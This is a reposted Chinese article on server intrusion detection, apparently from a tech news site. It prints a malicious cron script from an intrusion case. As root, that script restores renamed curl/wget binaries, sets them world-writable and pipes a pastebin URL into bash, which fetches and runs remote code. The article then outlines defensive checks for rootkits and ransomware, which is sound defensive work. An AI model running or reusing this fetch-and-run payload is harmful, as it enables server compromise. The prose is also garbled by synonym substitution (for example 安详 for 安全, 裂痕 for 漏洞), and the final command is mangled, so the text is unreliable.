加入收藏 | 设为首页 | 会员中心 | 我要投稿 湖南网 (https://www.hunanwang.cn/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 业界 > 正文

态势感知——服务器安全策略探索

发布时间:2019-02-22 07:21:44 所属栏目:业界 来源:4hou
导读:0x00、营业需求 企业IT架构数字化转型的大潮中,每每谋面对各类百般的安详威胁,包罗:体系和应用软件裂痕操作进攻,APT进攻,数据泄漏,云处事器滥用,DDoS进攻等。同时为了应对速率越来越快的收集犯法进攻,以及针对性进攻的多态化。为我们安详职员提出

我们先看一个入侵案例,以下剧本是用户放到按时使命中的颠末base64加密的剧本,通过替代curl、wget实现历程收集通信潜匿的目标。

  1. import os 
  2. import os.path 
  3.  
  4. def GetDeps(): 
  5.  
  6.    if os.path.isfile('/usr/bin/url'): 
  7.         os.system("mv /usr/bin/url /usr/bin/curl") 
  8.         os.system("chmod 777 /usr/bin/curl") 
  9.         os.system("chmod +x /usr/bin/curl") 
  10.  
  11.     if os.path.isfile('/usr/bin/get'): 
  12.         os.system("mv /usr/bin/get /usr/bin/wget") 
  13.         os.system("chmod 777 /usr/bin/wget") 
  14.         os.system("chmod +x /usr/bin/wget") 
  15.  
  16.     if not os.path.isfile('/usr/bin/wget'): 
  17.         os.system("yum clean all") 
  18.         os.system("yum -y install wget") 
  19.         os.system("apt-get update") 
  20.         os.system("apt-get -y install wget") 
  21.  
  22.     if not os.path.isfile('/usr/bin/curl'): 
  23.         os.system("yum clean all") 
  24.         os.system("yum -y install curl") 
  25.         os.system("apt-get update") 
  26.         os.system("apt-get -y install wget") 
  27.  
  28. if os.getuid()==0: 
  29.     GetDeps() 
  30. os.system("(curl -fsSL https://pastebin.com/raw/JuBCmASZ||wget -q -O- https://pastebin.com/raw/JuBCmASZ)|bash%7Cbash)") 

因为存在我们安装的处事器早年中过rootkit措施的环境。

检测流程

1、必要从长途下载wgetcurlpslsnetstatss等收集和文件检测器材

2、与当地对应的文件做比拟检测找到diff。

3、假如存在Diff,证明存在rootkit的恶意举动,告警。

  • 打单软件

检测思绪:

1、上传文件建设基本数据信息、上传历程快照信息。

2、统计平常文件建设数据,配置动态基本数据基线。

3、假如单台处事器建设量超出平常2倍以上,必要把对应的文件上传到云查杀说明,假如发明打单软件病毒标签告警。

0x03、总结

处事器安详检测是一项很是繁琐,而且非凡环境较量多的事变,必要这些检测法则和本领自动化成威胁模子。同时,人工threat huning功效也要不绝插手,形成正向反馈,良性轮回。

(编辑:湖南网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

热点阅读